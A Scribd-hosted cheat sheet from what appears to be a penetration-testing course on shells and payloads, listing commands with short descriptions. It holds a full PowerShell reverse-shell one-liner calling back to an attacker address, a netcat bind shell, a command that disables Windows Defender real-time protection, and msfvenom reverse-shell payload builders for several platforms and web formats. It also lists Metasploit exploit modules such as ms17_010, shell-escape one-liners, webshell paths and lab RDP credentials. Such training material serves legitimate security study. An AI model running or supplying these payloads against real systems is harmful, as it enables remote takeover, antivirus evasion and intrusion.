Thanks to visit codestin.com
Credit goes to www.scribd.com

0% found this document useful (0 votes)
421 views6 pages

Shells Payloads Module Cheat Sheet

The document provides information on various commands and payloads that can be used for tasks like connecting to remote systems, establishing reverse shells, and bypassing antivirus defenses. Some of the entries described include using netcat to set up a listening shell, Powershell commands for connecting back to an attacker's machine, and the Metasploit psexec exploit module.

Uploaded by

rolandontheropes
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
421 views6 pages

Shells Payloads Module Cheat Sheet

The document provides information on various commands and payloads that can be used for tasks like connecting to remote systems, establishing reverse shells, and bypassing antivirus defenses. Some of the entries described include using netcat to set up a listening shell, Powershell commands for connecting back to an attacker's machine, and the Metasploit psexec exploit module.

Uploaded by

rolandontheropes
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 6

SHELLS & PAYLOADS

CHEAT SHEET
Commands Description

xfreerdp /v:10.129.x.x /u:htb-student /p:HTB_@cademy_stdnt! CLI-based


tool used to
connect to a
Windows
target using
the Remote
Desktop
Protocol

env Works with


many
different
command
language
interpreters to
discover the
environmental
variables of a
system. This
is a great way
to find out
which shell
language is in
use

sudo nc -lvnp <port #> Starts a


netcat
listener on a
specified port

nc -nv <ip address of computer with listener started><port being listened on> Connects to a
netcat listener
at the
specified IP
address and
port
Commands Description

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f Uses netcat
to bind a shell
(/bin/bash)
the specified
IP address
and port. This
allows for a
shell session
to be served
remotely to
anyone
connecting to
the computer
this command
has been
issued on

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream(); Powershell


[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName one-liner
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS used to
' + (pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" connect back
to a listener
that has been
started on an
attack box

Set-MpPreference -DisableRealtimeMonitoring $true Powershell


command
using to
disable real
time
monitoring in
Windows
Defender

use exploit/windows/smb/psexec Metasploit


exploit
module that
can be used
on vulnerable
Windows
system to
establish a
shell session
utilizing smb &
psexec

shell Command
used in a
meterpreter
shell session
to drop into a
system shell

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > nameoffile.elf MSFvenom


command
used to
generate a
linux-based
reverse shell
stageless
payload
Commands Description

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > nameoffile.exe MSFvenom


command
used to
generate a
Windows-
based
reverse shell
stageless
payload

msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f macho > nameoffile.macho MSFvenom


command
used to
generate a
MacOS-
based
reverse shell
payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.113 LPORT=443 -f asp > nameoffile.asp MSFvenom


command
used to
generate a
ASP web
reverse shell
payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f raw > nameoffile.jsp MSFvenom


command
used to
generate a
JSP web
reverse shell
payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f war > nameoffile.war MSFvenom


command
used to
generate a
WAR java/jsp
compatible
web reverse
shell payload

use auxiliary/scanner/smb/smb_ms17_010 Metasploit


exploit
module used
to check if a
host is
vulnerable to
ms17_010
Commands Description

use exploit/windows/smb/ms17_010_psexec Metasploit


exploit
module used
to gain a
reverse shell
session on a
Windows-
based system
that is
vulnerable to
ms17_010

use exploit/linux/http/rconfig_vendors_auth_file_upload_rce Metasploit


exploit
module that
can be used
to optain a
reverse shell
on a
vulnerable
linux system
hosting
rConfig
3.9.6

python -c 'import pty; pty.spawn("/bin/sh")' Python


command
used to
spawn an
interactive
shell on a
linux-based
system

/bin/sh -i Spawns an
interactive
shell on a
linux-based
system

perl —e 'exec "/bin/sh";' Uses perl to


spawn an
interactive
shell on a
linux-based
system

ruby: exec "/bin/sh" Uses ruby to


spawn an
interactive
shell on a
linux-based
system

Lua: os.execute('/bin/sh') Uses Lua to


spawn an
interactive
shell on a
linux-based
system
Commands Description

awk 'BEGIN {system("/bin/sh")}' Uses awk


command to
spawn an
interactive
shell on a
linux-based
system

find / -name nameoffile 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \; Uses find


command to
spawn an
interactive
shell on a
linux-based
system

find . -exec /bin/sh \; -quit An alternative


way to use
the find
command to
spawn an
interactive
shell on a
linux-based
system

vim -c ':!/bin/sh' Uses the text-


editor VIM to
spawn an
interactive
shell. Can be
used to
escape "jail-
shells"

ls -la <path/to/fileorbinary> Used to list


files &
directories on
a linux-based
system and
shows the
permission for
each file in
the chosen
directory. Can
be used to
look for
binaries that
we have
permission to
execute

sudo -l Displays the


commands
that the
currently
logged on
user can run
as sudo
Commands Description

/usr/share/webshells/laudanum Location of
laudanum
webshellson
ParrotOS and
Pwnbox

/usr/share/nishang/Antak-WebShell Location of
Antak-
Webshell on
Parrot OS
and Pwnbox

You might also like